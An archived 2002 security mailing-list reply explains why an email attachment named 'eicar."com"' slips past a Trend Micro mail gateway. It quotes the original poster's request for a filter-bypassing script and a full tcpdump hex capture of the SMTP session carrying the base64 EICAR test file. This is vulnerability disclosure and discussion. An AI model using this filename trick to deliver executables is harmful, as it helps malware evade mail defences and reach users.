NEOHAPSIS - Peace of Mind Through Integrity and Insight

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Vuln-Dev> 2002-q1

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Sun Feb 24 2002 - 05:09:30 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Dear Onie Camara,

dump you sent exploits vulnerability found by Aidan O'Kelly
<aidanokellyoceanfree.net> (see section I.9 in
http://www.security.nnov.ru/advisories/content.asp )

It uses filename="eicar."com" - older versions of Outlook Express and
Outlook convert this filename to "eicar.com", others - to "eicar._com" -
that's why you failed.

--Saturday, February 23, 2002, 8:37:29 PM, you wrote to incidentssecurityfocus.com:

OC> Hi guys,

OC> I don't know where to post actually.

OC> I am very interested in security and would like some of your help.

OC> I have found, I hope, a vulnerability in Trend Micro interscan viruswall.
OC> I have a setup of qmail and sqwebmail running on freebsd. When I send an
OC> email from sqwebmail containing
OC> the eicar test virus attachment, the attachment is bypassed by Interscan and
OC> is successfully delivered .

OC> I have escalated this to Trend Micro since the early week of January and
OC> until now, even with the latest pattern
OC> file, it is still bypassed.

OC> This is somewhat related to the Feb 18 post at
OC> http://www.securiteam.com/securitynews/5DP0I206AY.html

OC> Now, since I will be doing a pentest for another company, I would like some
OC> help on where I can download
OC> a perl script that will send an exe,com attachment to a mail server but will
OC> bypass the filtering gateway.

OC> I have used this script, http://www.securiteam.com/exploits/5ZP0D2K6AY.html
OC> It works but
OC> the extension's attachment changes. Ex. eicar.com will become eicar._com

OC> Here is a tcpdump:

OC> bash# tcpdump -x -X -s 14400 port not 22 and port not 53 and not arp and
OC> port not 68 and port not 67 and port not 80 and not igmp
OC> tcpdump: listening on xl0
OC> 11:23:45.478174 65.192.117.68.1760 > dhcp-74-1628.smtp: S
OC> 2796302688:2796302688(0) win 16384 <mss 1460,nop,nop,sackOK,nop,wscale
OC> 0,nop,nop,timestamp 546622090 0> (DF)
OC> 0x0000 4500 0040 66b1 4000 3406 1f70 41c0 7544 E..f..4..pA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3160 0000 0000 ..........1`....
OC> 0x0020 b002 4000 6b45 0000 0204 05b4 0101 0402 ...kE..........
OC> 0x0030 0103 0300 0101 080a 2094 ca8a 0000 0000 ................
OC> 11:23:45.478679 dhcp-74-1628.smtp > 65.192.117.68.1760: S
OC> 1437153606:1437153606(0) ack 2796302689 win 33304 <mss 1460,nop,wscale
OC> 0,nop,nop,timestamp 908042 546622090> (DF)
OC> 0x0000 4500 003c 0f7c 4000 4006 6aa9 0cf8 fc9a E..<.|..j.....
OC> 0x0010 41c0 7544 0019 06e0 55a9 3946 a6ac 3161 A.uD....U.9F..1a
OC> 0x0020 a012 8218 d41b 0000 0204 05b4 0103 0300 ................
OC> 0x0030 0101 080a 000d db0a 2094 ca8a ............
OC> 11:23:45.494674 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 1 win 17376
OC> <nop,nop,timestamp 546622090 908042> (DF)
OC> 0x0000 4500 0034 42c4 4000 3406 4369 41c0 7544 E..4B..4.CiA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3947 ..........1aU.9G
OC> 0x0020 8010 43e0 3e18 0000 0101 080a 2094 ca8a ..C.>...........
OC> 0x0030 000d db0a ....
OC> 11:23:45.530047 dhcp-74-1628.smtp > 65.192.117.68.1760: P 1:43(42) ack 1 win
OC> 33304 <nop,nop,timestamp 908048 546622090> (DF)
OC> 0x0000 4500 005e 7e6d 4000 4006 fb95 0cf8 fc9a E..^~m........
OC> 0x0010 41c0 7544 0019 06e0 55a9 3947 a6ac 3161 A.uD....U.9G..1a
OC> 0x0020 8018 8218 e931 0000 0101 080a 000d db10 .....1..........
OC> 0x0030 2094 ca8a 3232 3020 7072 6f6d 6973 6375 ....220.promiscu
OC> 0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 2045 ous.dyndns.org.E
OC> 0x0050 534d 5450 2050 6f73 7466 6978 0d0a SMTP.Postfix..
OC> 11:23:45.553735 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 43 win 17376
OC> <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000 4500 0034 2223 4000 3406 640a 41c0 7544 E..4"#.4.d.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
OC> 0x0020 8010 43e0 3de8 0000 0101 080a 2094 ca8a ..C.=...........
OC> 0x0030 000d db10 ....
OC> 11:23:45.553933 65.192.117.68.1760 > dhcp-74-1628.smtp: P 1:33(32) ack 43
OC> win 17376 <nop,nop,timestamp 546622090 908048> (DF)
OC> 0x0000 4500 0054 5ac7 4000 3406 2b46 41c0 7544 E..TZ..4.+FA.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3161 55a9 3971 ..........1aU.9q
OC> 0x0020 8018 43e0 85fe 0000 0101 080a 2094 ca8a ..C.............
OC> 0x0030 000d db10 4548 4c4f 2061 6e74 6973 7061 ....EHLO.antispa
OC> 0x0040 6d2e 7265 6d69 6e67 746f 6e6c 7464 2e63 m.remingtonltd.c
OC> 0x0050 6f6d 0d0a om..
OC> 11:23:45.554671 dhcp-74-1628.smtp > 65.192.117.68.1760: P 43:151(108) ack 33
OC> win 33304 <nop,nop,timestamp 908050 546622090> (DF)
OC> 0x0000 4500 00a0 b62a 4000 4006 c396 0cf8 fc9a E....*........
OC> 0x0010 41c0 7544 0019 06e0 55a9 3971 a6ac 3181 A.uD....U.9q..1.
OC> 0x0020 8018 8218 5f91 0000 0101 080a 000d db12 ...._...........
OC> 0x0030 2094 ca8a 3235 302d 7072 6f6d 6973 6375 ....250-promiscu
OC> 0x0040 6f75 732e 6479 6e64 6e73 2e6f 7267 0d0a ous.dyndns.org..
OC> 0x0050 3235 302d 5049 5045 4c49 4e49 4e47 0d0a 250-PIPELINING..
OC> 0x0060 3235 302d 5349 5a45 2032 3030 3030 3030 250-SIZE.2000000
OC> 0x0070 300d 0a32 3530 2d56 5246 590d 0a32 3530 0..250-VRFY..250
OC> 0x0080 2d45 5452 4e0d 0a32 3530 2d58 5645 5250 -ETRN..250-XVERP
OC> 0x0090 0d0a 3235 3020 3842 4954 4d49 4d45 0d0a ..250.8BITMIME..
OC> 11:23:45.571627 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 151 win 17268
OC> <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000 4500 0034 0598 4000 3406 8095 41c0 7544 E..4...4...A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
OC> 0x0020 8010 4374 3dc6 0000 0101 080a 2094 ca8a ..Ct=...........
OC> 0x0030 000d db12 ....
OC> 11:23:45.573727 65.192.117.68.1760 > dhcp-74-1628.smtp: P 33:101(68) ack 151
OC> win 17376 <nop,nop,timestamp 546622090 908050> (DF)
OC> 0x0000 4500 0078 01ee 4000 3406 83fb 41c0 7544 E..x...4...A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 3181 55a9 39dd ..........1.U.9.
OC> 0x0020 8018 43e0 4202 0000 0101 080a 2094 ca8a ..C.B...........
OC> 0x0030 000d db12 4d41 494c 2046 524f 4d3a 3c3e ....MAIL.FROM:<>
OC> 0x0040 2053 495a 453d 3131 3139 0d0a 5243 5054 .SIZE=1119..RCPT
OC> 0x0050 2054 4f3a 3c6e 6569 6c40 7265 7374 7269 .TO:<neilrestri
OC> 0x0060 6374 6564 2e64 796e 646e 732e 6f72 673e cted.dyndns.org>
OC> 0x0070 0d0a 4441 5441 0d0a ..DATA..
OC> 11:23:45.580592 dhcp-74-1628.smtp > 65.192.117.68.1760: P 151:204(53) ack
OC> 101 win 33304 <nop,nop,timestamp 908053 546622090> (DF)
OC> 0x0000 4500 0069 6a03 4000 4006 0ff5 0cf8 fc9a E..ij.........
OC> 0x0010 41c0 7544 0019 06e0 55a9 39dd a6ac 31c5 A.uD....U.9...1.
OC> 0x0020 8018 8218 502b 0000 0101 080a 000d db15 ....P+..........
OC> 0x0030 2094 ca8a 3235 3020 4f6b 0d0a 3235 3020 ....250.Ok..250.
OC> 0x0040 4f6b 0d0a 3335 3420 456e 6420 6461 7461 Ok..354.End.data
OC> 0x0050 2077 6974 6820 3c43 523e 3c4c 463e 2e3c .with.<CR><LF>.<
OC> 0x0060 4352 3e3c 4c46 3e0d 0a CR><LF>..
OC> 11:23:45.607780 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 204 win 17323
OC> <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000 4500 0034 2d7e 4000 3406 58af 41c0 7544 E..4-~.4.X.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
OC> 0x0020 8010 43ab 3d13 0000 0101 080a 2094 ca8a ..C.=...........
OC> 0x0030 000d db15 ....
OC> 11:23:45.615561 65.192.117.68.1760 > dhcp-74-1628.smtp: P 101:1229(1128) ack
OC> 204 win 17376 <nop,nop,timestamp 546622090 908053> (DF)
OC> 0x0000 4500 049c 4e19 4000 3406 33ac 41c0 7544 E...N..4.3.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 31c5 55a9 3a12 ..........1.U.:.
OC> 0x0020 8018 43e0 715b 0000 0101 080a 2094 ca8a ..C.q[..........
OC> 0x0030 000d db15 5265 6365 6976 6564 3a20 6672 ....Received:.fr
OC> 0x0040 6f6d 2079 6f75 2028 6c6f 6361 6c68 6f73 om.you.(localhos
OC> 0x0050 7420 5b31 3237 2e30 2e30 2e31 5d29 0d0a t.[127.0.0.1])..
OC> 0x0060 0962 7920 616e 7469 7370 616d 2e72 656d .by.antispam.rem
OC> 0x0070 696e 6774 6f6e 6c74 642e 636f 6d20 2850 ingtonltd.com.(P
OC> 0x0080 6f73 7466 6978 2920 7769 7468 2053 4d54 ostfix).with.SMT
OC> 0x0090 5020 6964 2036 3730 4237 4538 4434 0d0a P.id.670B7E8D4..
OC> 0x00a0 0966 6f72 203c 6e65 696c 4072 6573 7472 .for.<neilrestr
OC> 0x00b0 6963 7465 642e 6479 6e64 6e73 2e6f 7267 icted.dyndns.org
OC> 0x00c0 3e3b 2053 6174 2c20 3233 2046 6562 2032 >;.Sat,.23.Feb.2
OC> 0x00d0 3030 3220 3131 3a31 363a 3137 202d 3036 002.11:16:17.-06
OC> 0x00e0 3030 2028 4353 5429 0d0a 4672 6f6d 3a20 00.(CST)..From:.
OC> 0x00f0 736f 6d65 4072 656d 696e 6774 6f6e 6c74 someremingtonlt
OC> 0x0100 642e 636f 6d0d 0a54 6f3a 206e 6569 6c40 d.com..To:.neil
OC> 0x0110 7265 7374 7269 6374 6564 2e64 796e 646e restricted.dyndn
OC> 0x0120 732e 6f72 670d 0a53 7562 6a65 6374 3a20 s.org..Subject:.
OC> 0x0130 7465 7374 0d0a 4d49 4d45 2d56 6572 7369 test..MIME-Versi
OC> 0x0140 6f6e 3a20 312e 300d 0a43 6f6e 7465 6e74 on:.1.0..Content
OC> 0x0150 2d54 7970 653a 206d 756c 7469 7061 7274 -Type:.multipart
OC> 0x0160 2f72 656c 6174 6564 3b0d 0a20 2020 2020 /related;.......
OC> 0x0170 2020 2074 7970 653d 226d 756c 7469 7061 ...type="multipa
OC> 0x0180 7274 2f61 6c74 6572 6e61 7469 7665 223b rt/alternative";
OC> 0x0190 0d0a 2020 2020 2020 2020 626f 756e 6461 ..........bounda
OC> 0x01a0 7279 3d22 4e65 7874 5061 7274 3139 220d ry="NextPart19".
OC> 0x01b0 0a4d 6573 7361 6765 2d49 643a 203c 3230 .Message-Id:.<20
OC> 0x01c0 3032 3032 3233 3137 3136 3137 2e36 3730 020223171617.670
OC> 0x01d0 4237 4538 4434 4061 6e74 6973 7061 6d2e B7E8D4antispam.
OC> 0x01e0 7265 6d69 6e67 746f 6e6c 7464 2e63 6f6d remingtonltd.com
OC> 0x01f0 3e0d 0a44 6174 653a 2053 6174 2c20 3233 >..Date:.Sat,.23
OC> 0x0200 2046 6562 2032 3030 3220 3131 3a31 363a .Feb.2002.11:16:
OC> 0x0210 3137 202d 3036 3030 2028 4353 5429 0d0a 17.-0600.(CST)..
OC> 0x0220 0d0a 5468 6973 2069 7320 6120 6d75 6c74 ..This.is.a.mult
OC> 0x0230 692d 7061 7274 206d 6573 7361 6765 2069 i-part.message.i
OC> 0x0240 6e20 4d49 4d45 2066 6f72 6d61 742e 0d0a n.MIME.format...
OC> 0x0250 0d0a 2d2d 4e65 7874 5061 7274 3139 0d0a ..--NextPart19..
OC> 0x0260 436f 6e74 656e 742d 5479 7065 3a20 6d75 Content-Type:.mu
OC> 0x0270 6c74 6970 6172 742f 616c 7465 726e 6174 ltipart/alternat
OC> 0x0280 6976 653b 0d0a 2020 2020 2020 2020 626f ive;..........bo
OC> 0x0290 756e 6461 7279 3d22 4e65 7874 5061 7274 undary="NextPart
OC> 0x02a0 3230 220d 0a0d 0a2d 2d4e 6578 7450 6172 20"....--NextPar
OC> 0x02b0 7432 300d 0a43 6f6e 7465 6e74 2d54 7970 t20..Content-Typ
OC> 0x02c0 653a 2074 6578 742f 706c 6169 6e0d 0a43 e:.text/plain..C
OC> 0x02d0 6f6e 7465 6e74 2d54 7261 6e73 6665 722d ontent-Transfer-
OC> 0x02e0 456e 636f 6469 6e67 3a20 7175 6f74 6564 Encoding:.quoted
OC> 0x02f0 2d70 7269 6e74 6162 6c65 0d0a 0d0a 2d2d -printable....--
OC> 0x0300 4e65 7874 5061 7274 3230 0d0a 436f 6e74 NextPart20..Cont
OC> 0x0310 656e 742d 5479 7065 3a20 7465 7874 2f68 ent-Type:.text/h
OC> 0x0320 746d 6c3b 0d0a 2020 2020 2020 2020 6368 tml;..........ch
OC> 0x0330 6172 7365 743d 2269 736f 2d38 3835 392d arset="iso-8859-
OC> 0x0340 3122 0d0a 436f 6e74 656e 742d 5472 616e 1"..Content-Tran
OC> 0x0350 7366 6572 2d45 6e63 6f64 696e 673a 2071 sfer-Encoding:.q
OC> 0x0360 756f 7465 642d 7072 696e 7461 626c 650d uoted-printable.
OC> 0x0370 0a0d 0a74 6573 740d 0a2d 2d4e 6578 7450 ...test..--NextP
OC> 0x0380 6172 7432 302d 2d0d 0a0d 0a2d 2d4e 6578 art20--....--Nex
OC> 0x0390 7450 6172 7431 390d 0a43 6f6e 7465 6e74 tPart19..Content
OC> 0x03a0 2d54 7970 653a 2061 7070 6c69 6361 7469 -Type:.applicati
OC> 0x03b0 6f6e 2f78 2d6d 7364 6f77 6e6c 6f61 640d on/x-msdownload.
OC> 0x03c0 0a43 6f6e 7465 6e74 2d44 6973 706f 7369 .Content-Disposi
OC> 0x03d0 7469 6f6e 3a20 6174 7461 6368 6d65 6e74 tion:.attachment
OC> 0x03e0 3b66 696c 656e 616d 653d 2265 6963 6172 ;filename="eicar
OC> 0x03f0 2e22 636f 6d22 0d0a 436f 6e74 656e 742d ."com"..Content-
OC> 0x0400 5472 616e 7366 6572 2d45 6e63 6f64 696e Transfer-Encodin
OC> 0x0410 673a 2062 6173 6536 340d 0a0d 0a57 4456 g:.base64....WDV
OC> 0x0420 5049 5641 6c51 4546 5157 7a52 6355 4670 PIVAlQEFQWzRcUFp
OC> 0x0430 594e 5451 6f55 4634 704e 304e 444b 5464 YNTQoUF4pN0NDKTd
OC> 0x0440 394a 4556 4a51 3046 534c 564e 5551 5535 9JEVJQ0FSLVNUQU5
OC> 0x0450 4551 564a 454c 5546 4f56 456c 5753 564a EQVJELUFOVElWSVJ
OC> 0x0460 5655 7931 5552 564e 550d 0a4c 555a 4a54 VUy1URVNU..LUZJT
OC> 0x0470 4555 684a 4567 7253 436f 4e43 673d 3d0d EUhJEgrSCoNCg==.
OC> 0x0480 0a0d 0a2d 2d4e 6578 7450 6172 7431 392d ...--NextPart19-
OC> 0x0490 2d0d 0a2e 0d0a 5155 4954 0d0a -.....QUIT..
OC> 11:23:45.709692 dhcp-74-1628.smtp > 65.192.117.68.1760: . ack 1229 win 33304
OC> <nop,nop,timestamp 908066 546622090> (DF)
OC> 0x0000 4500 0034 cc50 4000 4006 addc 0cf8 fc9a E..4.P........
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
OC> 0x0020 8010 8218 fa30 0000 0101 080a 000d db22 .....0........."
OC> 0x0030 2094 ca8a ....
OC> 11:23:47.074647 dhcp-74-1628.smtp > 65.192.117.68.1760: P 204:243(39) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000 4500 005b 9c6c 4000 4006 dd99 0cf8 fc9a E..[.l........
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a12 a6ac 362d A.uD....U.:...6-
OC> 0x0020 8018 8218 00bc 0000 0101 080a 000d dbaa ................
OC> 0x0030 2094 ca8a 3235 3020 4f6b 3a20 7175 6575 ....250.Ok:.queu
OC> 0x0040 6564 2061 7320 3843 4237 3635 3334 3745 ed.as.8CB765347E
OC> 0x0050 0d0a 3232 3120 4279 650d 0a ..221.Bye..
OC> 11:23:47.074908 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1229 win 33304 <nop,nop,timestamp 908202 546622090> (DF)
OC> 0x0000 4500 0034 fa45 4000 4006 7fe7 0cf8 fc9a E..4.E........
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362d A.uD....U.:9..6-
OC> 0x0020 8011 8218 f980 0000 0101 080a 000d dbaa ................
OC> 0x0030 2094 ca8a ....
OC> 11:23:47.091722 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 243 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 4a13 4000 3406 3c1a 41c0 7544 E..4J..4.<.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
OC> 0x0020 8010 43e0 37b7 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.092205 65.192.117.68.1760 > dhcp-74-1628.smtp: F 1229:1229(0) ack
OC> 243 win 17376 <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 4ca3 4000 3406 398a 41c0 7544 E..4L..4.9.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362d 55a9 3a39 ..........6-U.:9
OC> 0x0020 8011 43e0 37b6 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.092519 dhcp-74-1628.smtp > 65.192.117.68.1760: F 243:243(0) ack
OC> 1230 win 33304 <nop,nop,timestamp 908204 546622093> (DF)
OC> 0x0000 4500 0034 f518 4000 4006 8514 0cf8 fc9a E..4..........
OC> 0x0010 41c0 7544 0019 06e0 55a9 3a39 a6ac 362e A.uD....U.:9..6.
OC> 0x0020 8011 8218 f97a 0000 0101 080a 000d dbac .....z..........
OC> 0x0030 2094 ca8d ....
OC> 11:23:47.097243 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908202> (DF)
OC> 0x0000 4500 0034 5a93 4000 3406 2b9a 41c0 7544 E..4Z..4.+.A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
OC> 0x0020 8010 43e0 37b5 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbaa ....
OC> 11:23:47.109155 65.192.117.68.1760 > dhcp-74-1628.smtp: . ack 244 win 17376
OC> <nop,nop,timestamp 546622093 908204> (DF)
OC> 0x0000 4500 0034 3e09 4000 3406 4824 41c0 7544 E..4>..4.H$A.uD
OC> 0x0010 0cf8 fc9a 06e0 0019 a6ac 362e 55a9 3a3a ..........6.U.::
OC> 0x0020 8010 43e0 37b3 0000 0101 080a 2094 ca8d ..C.7...........
OC> 0x0030 000d dbac ....
OC> ^C

-- 
~/ZARAZA
Ýëåêòðè÷åñêèå øîêè î÷åíü ïîëåçíû äëÿ ôîðìèðîâàíèÿ õàðàêòåðà. (Ëåì)

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]